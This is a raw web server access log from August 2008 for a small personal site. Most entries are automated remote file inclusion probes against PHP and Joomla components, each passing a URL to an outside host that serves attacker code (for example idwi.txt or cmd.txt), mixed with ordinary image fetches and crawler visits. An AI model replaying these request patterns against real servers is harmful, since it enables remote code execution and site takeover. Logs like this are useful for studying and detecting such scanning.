163.19.117.1 - - [28/Aug/2008:09:49:47 -0700] "GET /logs/access_080103.log/index2.php?x=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:49:50 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-095_1.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
213.92.85.234 - - [28/Aug/2008:09:49:55 -0700] "GET /logs/access_080718.log/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://dj-kelly.com/guestbook////log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.255.60.127 - - [28/Aug/2008:09:49:56 -0700] "GET /logs/access_080810.log/errors.php?error=http://www.stjudechattanooga.org/css/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.60.127 - - [28/Aug/2008:09:49:56 -0700] "GET /errors.php?error=http://www.stjudechattanooga.org/css/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.92.85.234 - - [28/Aug/2008:09:49:56 -0700] "GET /plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://dj-kelly.com/guestbook////log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.255.60.127 - - [28/Aug/2008:09:49:56 -0700] "GET /logs/errors.php?error=http://www.stjudechattanooga.org/css/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.92.85.234 - - [28/Aug/2008:09:49:57 -0700] "GET /logs/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://dj-kelly.com/guestbook////log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
190.30.163.170 - - [28/Aug/2008:09:49:58 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://georgebush.estoyenred.es/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.30.163.170 - - [28/Aug/2008:09:50:02 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://georgebush.estoyenred.es/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.255.60.127 - - [28/Aug/2008:09:50:38 -0700] "GET /logs/access_080703.log/errors.php?error=http://www.stjudechattanooga.org/css/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.92.85.234 - - [28/Aug/2008:09:50:52 -0700] "GET /logs/access_080701.log/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://dj-kelly.com/guestbook////log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
12.206.23.168 - - [28/Aug/2008:09:51:11 -0700] "GET /logs/access_080810.log/errors.php?error=http://www.stjudechattanooga.org/css/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.206.23.168 - - [28/Aug/2008:09:51:11 -0700] "GET /errors.php?error=http://www.stjudechattanooga.org/css/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.206.23.168 - - [28/Aug/2008:09:51:11 -0700] "GET /logs/errors.php?error=http://www.stjudechattanooga.org/css/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [28/Aug/2008:09:51:14 -0700] "GET /logs/access_080413.log/index2.php?page=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [28/Aug/2008:09:51:14 -0700] "GET /index2.php?page=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:09:51:14 -0700] "GET /index2.php?x=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.218.170.130 - - [28/Aug/2008:09:51:14 -0700] "GET /logs/index2.php?page=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:09:51:16 -0700] "GET /index2.php?x=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:09:51:16 -0700] "GET /logs/index2.php?x=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:09:51:18 -0700] "GET /logs/index2.php?x=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.180.241.37 - - [28/Aug/2008:09:51:29 -0700] "GET /logs/access_080209.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.180.241.37 - - [28/Aug/2008:09:51:29 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.92.85.234 - - [28/Aug/2008:09:51:34 -0700] "GET /logs/access_080609.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dj-kelly.com/guestbook////log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.92.85.234 - - [28/Aug/2008:09:51:34 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dj-kelly.com/guestbook////log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.92.85.234 - - [28/Aug/2008:09:51:34 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dj-kelly.com/guestbook////log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:09:51:35 -0700] "GET /logs/access_080803.log/bemarket/postscript/postscript.php?p_mode=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.92.85.234 - - [28/Aug/2008:09:51:41 -0700] "GET /logs/access_080615.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dj-kelly.com/guestbook////log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.180.241.37 - - [28/Aug/2008:09:51:45 -0700] "GET /logs/access_071228.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:09:51:49 -0700] "GET /logs/index.php?option=com_restaurante&task=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:09:51:50 -0700] "GET /index.php?option=com_restaurante&task=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 85339 "-" "libwww-perl/5.808" "www.dmulk.com"
59.106.54.82 - - [28/Aug/2008:09:52:01 -0700] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.106.54.82 - - [28/Aug/2008:09:52:02 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 85635 "-" "libwww-perl/5.79" "www.dmulk.com"
193.111.11.7 - - [28/Aug/2008:09:52:29 -0700] "GET /logs/access_080529.log/errors.php?error=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [28/Aug/2008:09:52:31 -0700] "GET /logs/access_080615.log/errors.php?error=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:09:52:36 -0700] "GET /logs/access_080711.log//modules/xfsection/modify.php?dir_module=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:52:37 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-103_1.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
195.218.170.130 - - [28/Aug/2008:09:52:51 -0700] "GET /logs/access_080428.log/index2.php?page=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:09:53:43 -0700] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:09:53:44 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 85635 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.120 - - [28/Aug/2008:09:53:49 -0700] "GET / HTTP/1.0" 200 84760 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.254.61.170 - - [28/Aug/2008:09:53:54 -0700] "GET /logs/access_080616.log/index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://clan.gotr00t.net/temp//style.css?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:09:53:54 -0700] "GET /logs/access_080525.log/index.php?option=com_restaurante&task=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:53:54 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0075.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
137.192.243.2 - - [28/Aug/2008:09:53:55 -0700] "GET /logs/access_080518.log/index.php?option=com_restaurante&task=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
12.206.23.168 - - [28/Aug/2008:09:53:56 -0700] "GET /logs/access_080703.log/errors.php?error=http://www.stjudechattanooga.org/css/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.216 - - [28/Aug/2008:09:54:04 -0700] "GET / HTTP/1.0" 200 84776 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.92.85.234 - - [28/Aug/2008:09:54:21 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dj-kelly.com/guestbook////log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.92.85.234 - - [28/Aug/2008:09:54:22 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dj-kelly.com/guestbook////log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.93.133.122 - - [28/Aug/2008:09:54:40 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.travelsin.com//smile.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
69.93.133.122 - - [28/Aug/2008:09:54:40 -0700] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.travelsin.com//smile.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:54:45 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0044.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
72.29.70.187 - - [28/Aug/2008:09:55:01 -0700] "GET /logs/access_080214.log//admin/spaw/spaw_control.class.php?spaw_root=http://ip.vg/cache/idpula.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
72.29.70.187 - - [28/Aug/2008:09:55:01 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://ip.vg/cache/idpula.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
72.29.70.187 - - [28/Aug/2008:09:55:01 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://ip.vg/cache/idpula.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
69.93.217.235 - - [28/Aug/2008:09:55:18 -0700] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.93.217.235 - - [28/Aug/2008:09:55:18 -0700] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.93.217.235 - - [28/Aug/2008:09:55:18 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.93.217.235 - - [28/Aug/2008:09:55:19 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.93.217.235 - - [28/Aug/2008:09:55:19 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.93.217.235 - - [28/Aug/2008:09:55:19 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:55:42 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-067.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
72.29.70.187 - - [28/Aug/2008:09:55:51 -0700] "GET /logs/access_080131.log//admin/spaw/spaw_control.class.php?spaw_root=http://ip.vg/cache/idpula.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:09:55:57 -0700] "GET /logs/access_080223.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:09:55:57 -0700] "GET /logs/access_080216.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.211.39 - - [28/Aug/2008:09:56:03 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.39 - - [28/Aug/2008:09:56:03 -0700] "GET /megumi/minamigrad2k8/IMG_1638.CR2 HTTP/1.1" 200 196608 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
59.106.54.82 - - [28/Aug/2008:09:56:15 -0700] "GET /logs/index.php?option=com_restaurante&task=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.106.54.82 - - [28/Aug/2008:09:56:16 -0700] "GET /index.php?option=com_restaurante&task=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 85323 "-" "libwww-perl/5.79" "www.dmulk.com"
213.92.85.234 - - [28/Aug/2008:09:56:22 -0700] "GET /logs/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://dj-kelly.com/guestbook////log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.92.85.234 - - [28/Aug/2008:09:56:23 -0700] "GET /plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://dj-kelly.com/guestbook////log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:56:37 -0700] "GET /logs/access_080821.log///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
80.50.70.78 - - [28/Aug/2008:09:57:05 -0700] "GET /logs/access_080723.log/errors.php?error=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.50.70.78 - - [28/Aug/2008:09:57:06 -0700] "GET /errors.php?error=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.50.70.78 - - [28/Aug/2008:09:57:06 -0700] "GET /logs/errors.php?error=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.202.3.193 - - [28/Aug/2008:09:57:21 -0700] "GET /logs/access_080229.log/-scanhttp://www.dragondyne.com///modules/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.3.193 - - [28/Aug/2008:09:57:22 -0700] "GET /-scanhttp://www.dragondyne.com///modules/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.3.193 - - [28/Aug/2008:09:57:22 -0700] "GET /logs/-scanhttp://www.dragondyne.com///modules/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.3.193 - - [28/Aug/2008:09:57:35 -0700] "GET /logs/access_080805.log/-scanhttp://www.dragondyne.com///modules/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:57:49 -0700] "GET /logs/access_080525.log/joomla/index.php?option=com_restaurante&task=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:57:49 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:57:49 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:57:49 -0700] "GET /logs/access_080518.log/joomla/index.php?option=com_restaurante&task=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:57:53 -0700] "GET /logs/access_080525.log/joomla/index.php?option=com_restaurante&task=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:57:53 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:57:53 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:57:54 -0700] "GET /logs/access_080518.log/joomla/index.php?option=com_restaurante&task=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:57:57 -0700] "GET /logs/access_080525.log/joomla/index.php?option=com_restaurante&task=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:57:57 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:57:57 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:57:57 -0700] "GET /logs/access_080518.log/joomla/index.php?option=com_restaurante&task=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
80.50.70.78 - - [28/Aug/2008:09:58:07 -0700] "GET /logs/access_080722.log/errors.php?error=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:58:26 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-179_0.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
211.202.3.193 - - [28/Aug/2008:09:58:35 -0700] "GET /logs/-scanhttp://www.dragondyne.com///modules/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.3.193 - - [28/Aug/2008:09:58:36 -0700] "GET /-scanhttp://www.dragondyne.com///modules/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:58:44 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-019_2.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:58:55 -0700] "GET /logs/access_080511.log/senetman/html/index.php?page=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:58:55 -0700] "GET /senetman/html/index.php?page=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:58:55 -0700] "GET /logs/senetman/html/index.php?page=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:58:57 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-061_1.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:59:01 -0700] "GET /logs/access_080511.log/senetman/html/index.php?page=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:59:01 -0700] "GET /senetman/html/index.php?page=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:59:01 -0700] "GET /logs/senetman/html/index.php?page=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:59:05 -0700] "GET /logs/access_080511.log/senetman/html/index.php?page=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:59:05 -0700] "GET /logs/senetman/html/index.php?page=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:59:06 -0700] "GET /senetman/html/index.php?page=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:59:10 -0700] "GET /logs/access_080409.log/senetman/html/index.php?page=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
